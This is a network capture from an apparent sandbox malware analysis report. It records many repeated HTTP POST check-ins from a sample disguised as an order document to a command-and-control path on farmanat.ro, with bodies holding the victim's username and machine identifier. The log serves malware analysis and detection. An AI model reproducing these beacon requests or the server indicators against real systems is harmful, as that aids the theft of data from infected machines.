                                              Nov 25, 2021 10:55:01.928400993 CET7442OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:01.962481976 CET7442OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:02.012738943 CET7443INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              819192.168.11.2050667176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:02.442047119 CET7443OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:02.476366043 CET7444OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:02.572565079 CET7444INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:01 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              82192.168.11.2049919176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:52.111717939 CET6429OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:52.145091057 CET6429OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:52.198276997 CET6429INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              820192.168.11.2050668176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:02.979042053 CET7445OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:03.013314009 CET7445OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:03.093652964 CET7445INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              821192.168.11.2050669176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:03.513245106 CET7446OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:03.546888113 CET7446OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:03.610613108 CET7447INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:02 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              822192.168.11.2050670176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:03.981456995 CET7447OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:04.014763117 CET7448OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:04.066714048 CET7448INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              823192.168.11.2050671176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:04.538402081 CET7449OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:04.572664022 CET7449OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:04.624690056 CET7449INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:03 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              824192.168.11.2050672176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:05.052794933 CET7450OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:05.087060928 CET7450OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:05.137243986 CET7451INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              825192.168.11.2050673176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:05.569176912 CET7451OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:05.603360891 CET7452OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:05.660506010 CET7452INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:04 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              826192.168.11.2050674176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:06.082835913 CET7453OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:06.117062092 CET7453OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:06.169486046 CET7453INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              827192.168.11.2050675176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:06.598788977 CET7454OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:06.632414103 CET7454OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:06.694299936 CET7455INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:05 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              828192.168.11.2050676176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:07.053124905 CET7455OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:07.086771011 CET7456OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:07.137895107 CET7456INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              829192.168.11.2050677176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:07.557349920 CET7457OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:07.591834068 CET7457OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:07.641962051 CET7457INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:06 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              83192.168.11.2049920176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:48:52.644465923 CET6430OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:48:52.677970886 CET6430OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:48:52.727838993 CET6431INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:48:51 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              830192.168.11.2050678176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:08.069897890 CET7458OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:08.103163004 CET7458OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:08.153906107 CET7459INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              831192.168.11.2050679176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:08.535660028 CET7459OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:08.569844961 CET7460OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:08.619822979 CET7460INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:07 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              832192.168.11.2050680176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:08.993230104 CET7461OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:09.027662039 CET7461OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:09.086581945 CET7461INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              833192.168.11.2050681176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:09.501049995 CET7462OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:09.534815073 CET7462OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:09.590336084 CET7463INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:08 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                              Data Ascii: File not found.


                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              834192.168.11.2050682176.223.209.12880C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe
                                              TimestampkBytes transferredDirectionData
                                              Nov 25, 2021 10:55:10.027945995 CET7463OUTPOST /arman30/five/fre.php HTTP/1.0
                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                              Host: farmanat.ro
                                              Accept: */*
                                              Content-Type: application/octet-stream
                                              Content-Encoding: binary
                                              Content-Key: F45E6F10
                                              Content-Length: 151
                                              Connection: close
                                              Nov 25, 2021 10:55:10.062144995 CET7464OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00
                                              Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
                                              Nov 25, 2021 10:55:10.113701105 CET7464INHTTP/1.1 404 Not Found
                                              Server: nginx
                                              Date: Thu, 25 Nov 2021 09:55:09 GMT
                                              Content-Type: text/html; charset=UTF-8
                                              Connection: close
                                              Vary: Accept-Encoding
                                              X-Powered-By: PHP/7.0.33
                                              X-XSS-Protection: 1; mode=block
                                              X-Content-Type-Options: nosniff
